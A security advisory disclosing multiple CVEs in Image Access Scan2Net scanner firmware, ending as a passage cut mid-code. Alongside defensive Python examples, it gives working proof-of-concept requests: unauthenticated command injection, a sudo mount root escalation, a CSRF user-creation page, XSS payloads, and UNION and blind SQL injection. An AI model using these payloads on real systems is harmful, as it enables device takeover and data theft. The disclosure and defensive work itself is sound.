Multiple Critical Vulnerabilities in Image Access Scan2Net

Title

Multiple Critical Vulnerabilities

Product

Image Access Scan2Net

Vulnerable Version

Firmware <=7.40, <=7.42, <7.42B (depending on the vulnerability)

Fixed Version

mostly fixed in v7.42B

CVE Number

CVE-2024-28138, CVE-2024-28139, CVE-2024-28140, CVE-2024-28141, CVE-2024-28142, CVE-2024-28143, CVE-2024-28144, CVE-2024-28145, CVE-2024-28146, CVE-2024-47946, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494, CVE-2024-50584

Impact

critical

Found

22.06.2023

By

Daniel Hirschberger, Tobias Niemann (Office Bochum)

Multiple vulnerabilities allowed an unauthenticated attacker to execute arbitrary commands as the root user over the network on all devices running the Scan2Net software from Image Access. This mainly includes large-format paper scanners such as the WideTEK series. Additionally, an attacker could perform SQL injection to manipulate the database, perform a cross-site request forgery attack to reset the administrator's password or create a new user, perform cross-site scripting attacks to execute arbitrary JavaScript in the browser of victims, and decrypt exported configurations and directly connect to the database because of hard-coded credentials shared across devices.

Vendor description

"Scan2Net® - The Ultimate Scanning Technology

  • Better than just another client software package
  • Integrates into existing networks without additional drivers or PCs
  • Unrivaled performance, highest security, low connectivity cost

The Scan2Net® platform is the technological foundation of all WideTEK® and Bookeye® scanners from Image Access. It replaces the proprietary scanner drivers and software that traditional scanners require with the fastest common, nonproprietary connection available: TCP/IP over Ethernet. With network interface speeds much higher than USB or SCSI, Scan2Net devices are able to reach unrivaled performance at very low connectivity cost. The Linux based operating system is dedicated to scanner specific imaging and mechanical control tasks, further maximizing scanning speeds and performance."

Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en

Business recommendation

The vendor provides a firmware update to version 7.42B which should be installed immediately. SEC Consult could only partially verify the correction of all identified vulnerabilities. Some vulnerabilities have not been fixed by the vendor as the risk was accepted.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description

An unauthenticated attacker with network access to the scanner can execute any system command via the "msg_events.php" script as the www-data user.

The www-data user can elevate its privileges because sudo is configured to allow the execution of the mount command as root without a password. Therefore, the privileges can be escalated to the root user.

The scanner boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as the root user; some of them are self-developed, but those could not be exploited at first glance.

The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link.

Due to missing input sanitization, an attacker can perform cross-site scripting attacks and run arbitrary JavaScript in the browser of other users.

The password change function does not require the current password, which makes the application vulnerable to account takeover, especially if combined with the CSRF vulnerability.

Due to missing access control on the reboot and shutdown functions, an attacker can perform a denial-of-service attack against the application. Furthermore, an attacker who can spoof the IP address and the User-Agent of a logged-in user can take over the session because of flaws in the self-developed session management.

An unauthenticated attacker can perform an SQL injection by accessing the dbconnector.php file and supplying malicious GET parameters.

The application uses several hard-coded credentials for protecting the firmware update file and the installed database server.

By April 2024, ImageAccess GmbH provided us with an internet-facing test device and we spent a short time verifying the vulnerabilities in their latest firmware (7.40), which should fix the security issues according to the vendor. Unfortunately, most of them are still present and new ones have been discovered.

Update 2024-04-02 in short:

1) OS Command Injection: Fixed, but a new RCE vulnerability has been discovered which requires a session as Poweruser, updated PoC below. The second RCE issue is tracked as CVE-2024-47946.

2) Privilege Escalation: Still an issue.

3) Violation of Least Privilege Principle: Still an issue.

4) CSRF: Fixed. The introduced "session_id" cookie is protected with the "SameSite=Strict" cookie flag. This prevents CSRF attacks.

5) Stored XSS: Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered a new one, updated PoC below. The new XSS is tracked as CVE-2024-36498.

6) Insecure Password Change Function: Fixed. The password change function now requires the current password.

7.1) Reboot and Shutdown functions: Still an issue.

7.2) Broken Session Management: If two users access the web interface from the same IP they are logged in as the other user. Updated PoC below.

8) SQL Injection: Original issue fixed, but a new blind SQLi as Poweruser has been found, updated PoC below. The new SQLi is tracked as CVE-2024-50584.

9) Hard-coded Credentials: Still an issue, credentials can be found in different files.

By October 2024, ImageAccess GmbH provided us with an internet-facing test device and we spent a short time verifying the vulnerabilities in their latest firmware (7.42), which should fix the submitted critical security issues according to the vendor.

Update 2024-10-14 in short:

1) OS Command Injection: The new RCE vulnerability is fixed now.

2) Privilege Escalation: Still an open issue. The risk has been accepted by the vendor because the other critical issues are fixed and shell access is not easily possible anymore.

3) Violation of Least Privilege Principle: The kiosk browser is no longer running as root but many other custom services still are.

4) CSRF: Fixed.

5) Stored XSS: The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS vulnerability in the login page which only works if the target user is _not_ already logged in, which makes it ideal for login form phishing attempts. The new XSS is tracked as CVE-2024-36494.

6) Insecure Password Change Function: Fixed. The password change function now requires the current password.

7) Broken Access Control: Still an issue.

8) SQL Injection: The blind SQLi as Poweruser has been fixed.

9) Hard-coded Credentials: Mostly fixed. Many credentials can be found in different files. The most problematic 'support' user had their password rotated and it was not immediately obvious where it is stored now.

Figure 1: Output of the "id" command

Proof of concept

1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)

An unauthenticated attacker with network access can execute arbitrary commands by visiting the following URL. The HTTP GET parameter "data" is not properly sanitized:

https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND

For example, the following URL can be used to display information about the current user of the web server:

https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;id

The following image (figure 1) shows the output of the command:

Figure 2: Command Injection

Update 2024-04-02: The second issue is now tracked as CVE-2024-47946.

The OS command injection as shown above is no longer possible in the new firmware version 7.40. Another possibility to gain remote code execution has been identified if the attacker has access to a valid Poweruser session. Specifically crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP script executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data".
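For defenders who cannot update immediately, the request pattern above is easy to spot in web-server access logs. The following script is an added example written for this advisory page, not code from SEC Consult or the vendor: it parses combined-format access log lines (constructed samples, not real device traffic), URL-decodes the "data" parameter of requests to msg_events.php and flags values containing shell metacharacters, including the double-encoded variant (%253B) that a single decode would miss. The log format and the file path are assumptions.

```python
# Added example (not from the advisory or the vendor): flag access-log requests
# that match the msg_events.php command-injection pattern described above.
import re
from typing import Dict, List
from urllib.parse import unquote, unquote_plus, urlsplit

# Metacharacters that let a value break out of a shell command line; ';' is
# the separator used in the advisory's PoC, the others are common variants.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")

# Combined-format access log lines, constructed for this example (not real device traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jun/2023:10:01:02 +0200] "GET /class/msg_events.php?action=writemsgfifo&data=scanner_ready HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Jun/2023:10:01:07 +0200] "GET /class/msg_events.php?action=writemsgfifo&data=;id HTTP/1.1" 200 84 "-" "curl/8.0"
10.0.0.9 - - [22/Jun/2023:10:01:09 +0200] "GET /class/msg_events.php?action=writemsgfifo&data=%3Bcat%20/etc/passwd HTTP/1.1" 200 1402 "-" "curl/8.0"
10.0.0.5 - - [22/Jun/2023:10:02:00 +0200] "GET /ScanWizard.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def query_params(query: str) -> Dict[str, List[str]]:
    """Split a query string on '&' only; ';' is part of the payload here, never a separator."""
    params: Dict[str, List[str]] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def is_msg_events_injection(target: str) -> bool:
    """True if the request targets msg_events.php with a 'data' value that contains
    shell metacharacters after URL decoding (a second decode catches %253B-style evasion)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/class/msg_events.php"):
        return False
    for value in query_params(parts.query).get("data", []):
        if SHELL_META.search(unquote(value)):
            return True
    return False


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one record per log line that matches the injection pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_msg_events_injection(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "status": m["status"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {hit['target']}")
```

Run it against the real access log of the scanner's web server (or a proxy in front of it); a 200 response on a flagged request is the case to investigate first, since the advisory shows the command output being returned in the response.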

Figure 3: Sudo -L command
Figure 4: Sudo mount

2) Privilege Escalation (CVE-2024-28139)

By executing the command "sudo -l" as the www-data user, it is apparent that this user can be used to escalate privileges to root, as shown in figure 3.

The following commands can be executed to elevate to root privileges, as shown in figure 4.

> sudo mount -o bind /usr/bin/bash /usr/bin/mount
> sudo mount
Figure 5: Register user result

3) Violation of Least Privilege Principle (CVE-2024-28140)

Many processes are running with root privileges which violates the principle of Least Privilege.

This can be confirmed by running "ps aux" as the root user and observing the output:

root  /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080
root   \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
root       \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
[...]

Apart from the browser the following binaries are also run with root permissions:

vsftpd, smbd, wsdd.py, X11, OpenBox
s2n-specific binaries (copyd, s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd, ledd, wt36keyb, ...)
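Both findings 2 and 3 are configuration states that an administrator can check routinely. The script below is an added example for this page, not code from SEC Consult or the vendor: one function parses "sudo -l" output and reports NOPASSWD rules on binaries that can be turned into a root shell or root file writes when given free arguments (mount being the one abused above); the other parses "ps aux" output and lists root-owned processes whose executable is not on an expected baseline. The sample outputs, the escape-capable list and the baseline are constructed assumptions to be tuned per device.

```python
# Added example (not from the advisory or the vendor): audit helpers for the
# privilege findings above: passwordless sudo rules for a service account
# (finding 2) and root processes outside an expected baseline (finding 3).
import re
from typing import List, Tuple

# What "sudo -l" prints for the web-server account, constructed for this example.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on scanner:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on scanner:
    (root) NOPASSWD: /bin/mount
    (root) NOPASSWD: /bin/umount
    (root) /usr/sbin/service cups restart
"""

# Binaries that yield a root shell or arbitrary root-owned file writes when they can be
# run with unrestricted arguments; mount is the one the advisory shows (bind mount over
# a sudo-permitted path). Assumed list, extend per environment.
ESCAPE_CAPABLE = {"mount", "bash", "sh", "find", "vi", "vim", "less"}

# Rule line shape: "(runas) [TAG: ...] /path/to/command [args]"
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")


def risky_sudo_rules(sudo_l_output: str) -> List[Tuple[str, str]]:
    """Return (runas, command) for NOPASSWD rules on escape-capable binaries with free arguments."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        runas = m["runas"].strip()
        if "NOPASSWD" not in m["tags"] or runas not in ("root", "ALL"):
            continue
        if m["cmd"].rsplit("/", 1)[-1] in ESCAPE_CAPABLE and not m["args"].strip():
            findings.append((runas, m["cmd"]))
    return findings


# "ps aux" output, constructed for this example; mirrors the kind of entries the advisory lists.
SAMPLE_PS = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.1 169000  9000 ?        Ss   10:00   0:01 /sbin/init
root         812  0.0  0.0  12000  3000 ?        Ss   10:00   0:00 /usr/sbin/sshd -D
root        1201  2.1  1.0 900000 81000 ?        Sl   10:01   0:12 /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html
root        1250  0.0  0.2  30000  9000 ?        Ss   10:01   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
www-data    1300  0.0  0.3  50000 20000 ?        S    10:01   0:00 /usr/sbin/apache2 -k start
"""

# Executables that are expected to run as root on this host (assumed baseline).
ROOT_BASELINE = {"/sbin/init", "/usr/sbin/sshd"}


def unexpected_root_processes(ps_output: str) -> List[str]:
    """Return the command lines of root-owned processes whose executable is not in the baseline."""
    unexpected = []
    for line in ps_output.splitlines()[1:]:        # skip the header row
        fields = line.split(None, 10)               # COMMAND keeps its embedded spaces
        if len(fields) < 11 or fields[0] != "root":
            continue
        command = fields[10]
        if command.split()[0] not in ROOT_BASELINE:
            unexpected.append(command)
    return unexpected


if __name__ == "__main__":
    for runas, cmd in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"sudo: www-data may run {cmd} as {runas} without a password")
    for cmd in unexpected_root_processes(SAMPLE_PS):
        print(f"root process outside baseline: {cmd}")
```

Feed the functions the live output of `sudo -l` (run as the service account) and `ps aux`; the fix for a hit in the first list is to drop the rule or restrict it to fixed arguments, and for the second to run the service under a dedicated unprivileged account.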

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)

The application offers no protection against Cross-Site Request-Forgery. An attacker can therefore forge malicious links to reset the admin password or create new users.

4.1) Reset Admin Password

The following link resets the password of the administrator to the value "CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh).

https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm


4.2) Register a new user

The following code can be hosted on a malicious page controlled by the attacker. When a user who is logged in as administrator is lured by the attacker to visit this page, a new user "SECtest" with the password "CSRF2YOU!" is automatically created:

<html>
 <body>
   <form action="https://$SCANNER/cgi/upuserdata.cgi" method="POST">
     <input type="hidden" name="groupid" value="0" />
     <input type="hidden" name="username" value="SECtest" />
     <input type="hidden" name="pw1" value="CSRF2YOU!" />
     <input type="hidden" name="pw2" value="CSRF2YOU!" />
     <input type="submit" value="Submit request" />
   </form>
   <script>document.forms[0].submit();</script>
 </body>
</html>

The following image shows the result:

Figure 6: XSS scenario 1
Figure 7: XSS Scenario 1 triggered
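The auto-submitting form above works because the browser attaches the victim's session cookie to a request the victim never intended to send. The following added example (written for this page, not code from SEC Consult or the vendor) shows the two server-side controls that defeat it: a synchronizer token bound to the session with an HMAC, which an attacker's page cannot supply, and a session cookie carrying the SameSite=Strict attribute that the 7.40 firmware introduced. The handler name, the secret handling and the form fields are assumptions modelled on the PoC.

```python
# Added example (not from the advisory or the vendor): CSRF protection for a
# state-changing form such as the user-creation request in the PoC above.
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Per-deployment secret; generated at startup here, persisted in practice.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Random nonce plus an HMAC binding it to the session; embedded as a hidden form field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the HMAC for this session; a token issued for another session fails."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def session_cookie_header(session_id: str) -> str:
    """SameSite=Strict keeps the cookie off cross-site requests, so a form auto-submitted
    from an attacker's page arrives without any session at all."""
    return f"Set-Cookie: session_id={session_id}; Path=/; Secure; HttpOnly; SameSite=Strict"


def handle_create_user(session_id: str, form: Dict[str, str]) -> Tuple[int, str]:
    """Server side of the user-creation POST: reject any request lacking a valid token."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    if form.get("pw1") != form.get("pw2"):
        return 400, "passwords do not match"
    return 200, f"user {form['username']} created"


if __name__ == "__main__":
    sid = secrets.token_urlsafe(32)
    # The attacker's form from the PoC carries no token.
    forged = {"groupid": "0", "username": "SECtest", "pw1": "CSRF2YOU!", "pw2": "CSRF2YOU!"}
    print(handle_create_user(sid, forged))                    # 403
    # The application's own form embeds a token issued for this session.
    legit = dict(forged, csrf_token=issue_csrf_token(sid))
    print(handle_create_user(sid, legit))                     # 200
    print(session_cookie_header(sid))
```

The two controls are complementary: the token check also covers clients whose browsers do not honour SameSite, and the cookie attribute also covers endpoints that were forgotten when tokens were added.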

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)

There are at least two identified injection points:

5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142)

a. Login as Scan2Net User.
b. Navigate to User Settings -> File Name (https://$SCANNER/cgi/uset.cgi?-cfilename)
c. Edit the "Wildcard Character" %2 setting to contain the following payload and reference it in the file name:

> <script>alert(document.location)</script> 

d. The JavaScript payload will be saved automatically.
e. The payload will be triggered on each visit of the User Settings -> File Name page.

It is also executed when an admin visits the following page:

https://$SCANNER/cgi/uset.cgi?-cfilename

This attack can even be performed without being logged in because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" User can be changed. However, the wildcards can be changed without authentication. To inject the payload, the following two requests have to be submitted.

I. Changing the file name of the "Default" user to scan_xss%2.pdf:

https://$SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default

II. Changing the Wildcard %2 to the JavaScript payload:

https://$SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E
Figure 8: XSS scenario 2 insertion
Figure 9: XSS scenario 2 (trigger browser)
Figure 10: XSS scenario 2 (trigger touch)

5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947)

The "Edit Disclaimer Text" function of the configuration menu is also vulnerable. Only the users Poweruser and Admin can use this function, which is available at the URL

https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre

The JavaScript can be inserted as shown in figure 8.

Afterwards, this change has to be applied by clicking on the "Apply" button. From now on the payload will be executed every time the ScanWizard is loaded. The URL of the ScanWizard interface is: $SCANNER/ScanWizard.html (see figure 9).

This also includes the ScanWizard which is displayed in the Kiosk-mode browser which is present on the physical touch-enabled display of the scanner itself (see figure 10).

Update 2024-04-02:

The third issue is now tracked as CVE-2024-36498. The following text can be inserted as Poweruser into the disclaimer to exploit this issue:

%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e

This is the payload <Script>alert(1)</Script> URL-encoded.

Update 2024-10-14:

The fourth issue is now tracked as CVE-2024-36494. A new reflected XSS, which only works on unauthenticated targets, has been found:

https://$SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#<img/src="x"onerror="alert(1)"&gt

Update 2024-11-12:

The vendor tells us that the latest identified XSS issue should be fixed with version 7.42B.
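The sequence of fixes and bypasses in this finding (a lowercase tag blocked, a mixed-case and URL-encoded variant accepted, then an attribute-context injection on the login page) is the usual outcome of filtering input instead of encoding output. The example below is added for this page and is not SEC Consult's or the vendor's code; the blocklist function is a constructed stand-in for a fragile filter, not the actual filter in any firmware version. It shows the mixed-case payload passing the blocklist unchanged, the same payload neutralised by text-context encoding after URL decoding, and the login-page style payload unable to close the value attribute once quotes are encoded as well.

```python
# Added example (not from the advisory or the vendor): blocklist filtering versus
# context-aware output encoding for the XSS variants described above.
import html
from urllib.parse import unquote


def blocklist_filter(value: str) -> str:
    """Constructed stand-in for a fragile filter: strips only the exact lowercase tag,
    so the mixed-case variant from the 7.40 PoC passes straight through."""
    return value.replace("<script>", "").replace("</script>", "")


def render_text(value: str) -> str:
    """For HTML text content (e.g. the disclaimer or a wildcard echoed into a page)."""
    return html.escape(value, quote=False)


def render_attr(value: str) -> str:
    """For a double-quoted attribute value; quotes must be encoded too, otherwise the
    value can close the attribute and add an event handler, as on the login page."""
    return html.escape(value, quote=True)


def render_login_form(user_param: str) -> str:
    """Login form that reflects the user-name parameter into a value attribute."""
    return f'<input type="text" name="user" value="{render_attr(user_param)}">'


def stored_value_is_neutralized(raw_value: str) -> bool:
    """Decode as the server would, encode for output, and confirm no tag delimiter survives."""
    out = render_text(unquote(raw_value))
    return "<" not in out and ">" not in out


if __name__ == "__main__":
    mixed_case = "<Script>alert(1)</Script>"
    encoded = "%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e"
    print(blocklist_filter(mixed_case))          # unchanged: the filter is bypassed
    print(render_text(unquote(encoded)))         # &lt;Script&gt;alert(1)&lt;/Script&gt;
    print(render_login_form('user" onfocus=alert(1) autofocus b="'))
```

Encoding has to match the output context: text-context encoding is not enough inside an attribute, and neither is enough inside a script block or a URL, which is why the safe fix is to encode at every output point rather than to reject patterns at the input.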

6) Insecure Password Change Function (CVE-2024-28143)

The password change function does not require the user to enter the old password in order to set a new one. As explained in the CSRF finding (4.1), an attacker can use this to forcefully set a new password for a user without knowing the old password. The following link sets the password of the user who clicks on it to the value "CSRF2YOU!", which is "Q1NSRjJZT1Uh" when encoded with base64:

https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm

7) Broken Access Control (CVE-2024-28144)

7.1) Reboot and Shutdown functions

The functions "reboot" and "shutdown" can be called without any authorization checks nor any authentication:

https://$SCANNER/cgi/shutdown.cgi
https://$SCANNER/cgi/reboot.cgi

The authorization checks are also missing on the User Settings -> File Name function and on the dbconnector, as described in chapters 5.1 and 8 respectively.

Figure 11: Disclaimer
Figure 12: Authentication error

7.2) Broken Session Management

Scan2Net implements a custom algorithm for the session management. The algorithm is implemented the following way:

> SID1="$(/opt/s2n/bin/hide -s -e -i "$REMOTE_ADDR:$HTTP_USER_AGENT" -p $HOSTNAME)"

The result is stored in the database as the current session ID. On each access request to Scan2Net the SID1 is calculated and compared to the stored session ID in the database. This also means that only one user can be logged in at any time. Furthermore, an attacker who is able to spoof the IP address of a victim and knows the User Agent which was used to login, can take over the session of the victim.

Update 2024-04-02: The session management is still broken.

Start two browsers of your choice (this example uses Chrome and Firefox). Browse to $SCANNER_IP/cgi/config.cgi in both browsers. Notice that you are not logged in in either of them and your "login level" is "Default". Log in in Chrome as Poweruser. Refresh the page in Firefox and notice that your login level now displays "Poweruser".

Browse to https://$SCANNER/cgi/slogin.cgi?-tsetup+-uPoweruser in Firefox and click on "Edit Disclaimer Text". You will get the error message shown in figures 11 and 12.

In Firefox browse to $SCANNER_IP/ScanWizard.html, then $SCANNER_IP/cgi/setupmenu.cgi and click on "Edit Disclaimer Text" once more. This time you can edit the disclaimer.
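The root cause above is that the session identifier is a deterministic function of data the client controls (IP address and User-Agent), so it is both guessable and shared between any two clients that present the same values. The following added example, written for this page and not code from SEC Consult or the vendor, contrasts that with a server-side session store: the identifier is drawn from the operating system's CSPRNG at login, stored with the user and an expiry, and resolved by exact lookup with no reference to IP or User-Agent, so two browsers on the same host get independent sessions. The legacy_sid function is a constructed stand-in (a keyed hash of "ip:ua") to illustrate the collision, not the vendor's "hide" tool, and the store's names and TTL are assumptions.

```python
# Added example (not from the advisory or the vendor): a session store whose
# identifiers are random and server-side, versus a deterministic client-derived ID.
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

HOSTNAME = "scanner"   # stand-in for the $HOSTNAME key in the advisory's one-liner


def legacy_sid(remote_addr: str, user_agent: str) -> str:
    """Constructed stand-in for a client-derived session ID: any two clients sharing
    IP and User-Agent compute the same value, and a spoofed IP plus a known UA
    reproduces a victim's identifier."""
    msg = f"{remote_addr}:{user_agent}".encode()
    return hmac.new(HOSTNAME.encode(), msg, hashlib.sha256).hexdigest()


class SessionStore:
    """Random session tokens with expiry; one token per login, many concurrent users."""

    def __init__(self, ttl_seconds: int = 900):
        self._sessions: Dict[str, dict] = {}
        self.ttl = ttl_seconds

    def login(self, username: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)       # 256 bits from the OS CSPRNG, unguessable
        self._sessions[token] = {"user": username, "expires": now + self.ttl}
        return token

    def user_for(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Resolve a presented token; IP address and User-Agent play no part."""
        now = time.time() if now is None else now
        entry = self._sessions.get(token)
        if entry is None:
            return None
        if entry["expires"] < now:
            del self._sessions[token]           # expired: force a fresh login
            return None
        return entry["user"]

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)


if __name__ == "__main__":
    ua = "Mozilla/5.0"
    # Two browsers on one host: the legacy scheme hands both the same identifier.
    print(legacy_sid("10.0.0.5", ua) == legacy_sid("10.0.0.5", ua))   # True
    store = SessionStore(ttl_seconds=900)
    chrome = store.login("Poweruser")
    firefox_unauth = "not-a-real-token"
    print(store.user_for(chrome), store.user_for(firefox_unauth))     # Poweruser None
```

Tokens should also be rotated on login (to defeat fixation) and invalidated on logout and password change; the store above shows the lookup model, which is the part the custom algorithm got wrong.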

8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)

An unauthenticated attacker can reach the database connector at the following URL:

https://$SCANNER/class/dbconnect.php

The connector accepts several query parameters:

> action, search, table, field, value

Of those, the parameters search, table, field, and value are vulnerable to SQL injection. For example, one SQL injection can be performed on the parameter "field" with the UNION keyword. The following request returns the version of the SQL database server in use by union-selecting "@@version":

http://$SCANNER/class/dbconnect.php?action=getdbvalue&search=singlemode&table=user_touchscreen&field=configuration_name%20UNION%20ALL%20SELECT%20@@version--%20-&value=ScanWizard

The web server responds with:

> HTTP/1.1 200 OK
> […]
> 10.3.38-MariaDB-0+deb10u1

The database is accessed with the rights of the user "s2n".


Update 2024-04-02

The second issue is now tracked as CVE-2024-50584. The injection point shown above has been fixed in the new firmware (7.40), but a new exploitable injection point was discovered in template_io.php. An attacker with an active session as Poweruser can access the following URL:

https://$SCANNER/class/template_io.php

The PHP script processes the following query parameters:

> action, table, templates

The templates parameter is vulnerable to blind boolean-based SQL injection. SQL syntax must be injected into the JSON syntax of the templates parameter. As a short proof of concept, the following three requests can be sent:

https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default"}
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1336--+A"}
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1337--+A"}

For the 1st (no injection) and 3rd (true condition) requests, the server responds with the identical ZIP file:

> HTTP/1.1 200 OK
> […]
> Content-Length: 1699
> PK[…]

Only the response from the 2nd request (false condition) differs in length and content. This indicates that the injected SQL is processed by the database:

> HTTP/1.1 200 OK
> […]
> Content-Length: 1268
> PK[…]

The vulnerability was successfully exploited to exfiltrate data from the connected database. As before, the database is accessed with the db user "s2n".
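Both injection points share one defect: request parameters are spliced into SQL text. The example below is added for this page and is not SEC Consult's or the vendor's code; it rebuilds both connectors against an in-memory SQLite database so the behaviour can be observed offline. The statement shape SELECT <search> FROM <table> WHERE <field> = '<value>' and the table layouts are assumptions consistent with the PoC parameters, not the device's real schema or queries, and sqlite_version() stands in for MariaDB's @@version. The hardened versions show the part that parameter binding alone cannot solve: table and column names are identifiers, so they are checked against an allowlist, while the values (including each template name parsed from the JSON) are bound with placeholders.

```python
# Added example (not from the advisory or the vendor): the two injection points
# above rebuilt on SQLite, each beside a hardened version.
import json
import sqlite3
from typing import List, Tuple

# Tables and columns the connector may touch (assumed allowlist, not the real schema).
ALLOWED = {
    "user_touchscreen": {"configuration_name", "singlemode"},
    "printer": {"name", "config"},
}


def build_db() -> sqlite3.Connection:
    """Constructed sample data for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_touchscreen (configuration_name TEXT, singlemode TEXT)")
    conn.executemany("INSERT INTO user_touchscreen VALUES (?, ?)",
                     [("ScanWizard", "on"), ("Admin", "off")])
    conn.execute("CREATE TABLE printer (name TEXT, config TEXT)")
    conn.executemany("INSERT INTO printer VALUES (?, ?)", [("default", "{}"), ("lab", "{}")])
    conn.commit()
    return conn


def getdbvalue_vulnerable(conn, search, table, field, value) -> List[Tuple]:
    """dbconnect.php-style lookup with every parameter spliced into the statement;
    a UNION in 'field' appends the server version to the result, as in the PoC."""
    sql = f"SELECT {search} FROM {table} WHERE {field} = '{value}'"
    return conn.execute(sql).fetchall()


def getdbvalue_safe(conn, search, table, field, value) -> List[Tuple]:
    """Identifiers cannot be bound as parameters, so they are checked against the
    allowlist; only the value is bound with a placeholder."""
    columns = ALLOWED.get(table)
    if columns is None or search not in columns or field not in columns:
        raise ValueError("table or column not permitted")
    sql = f'SELECT "{search}" FROM "{table}" WHERE "{field}" = ?'
    return conn.execute(sql, (value,)).fetchall()


def export_templates_vulnerable(conn, table, templates_json) -> List[Tuple]:
    """template_io.php-style export: names parsed from JSON, then spliced into SQL.
    A false injected condition empties the result, a true one leaves it unchanged,
    which is the length difference the advisory observes."""
    rows = []
    for name in json.loads(templates_json).values():
        rows += conn.execute(f"SELECT name, config FROM {table} WHERE name = '{name}'").fetchall()
    return rows


def export_templates_safe(conn, table, templates_json) -> List[Tuple]:
    """Same export with the table allowlisted and every name bound as a parameter."""
    if table not in ALLOWED or "name" not in ALLOWED[table]:
        raise ValueError("table not permitted")
    names = list(json.loads(templates_json).values())
    if not names:
        return []
    placeholders = ",".join("?" * len(names))
    sql = f'SELECT name, config FROM "{table}" WHERE name IN ({placeholders})'
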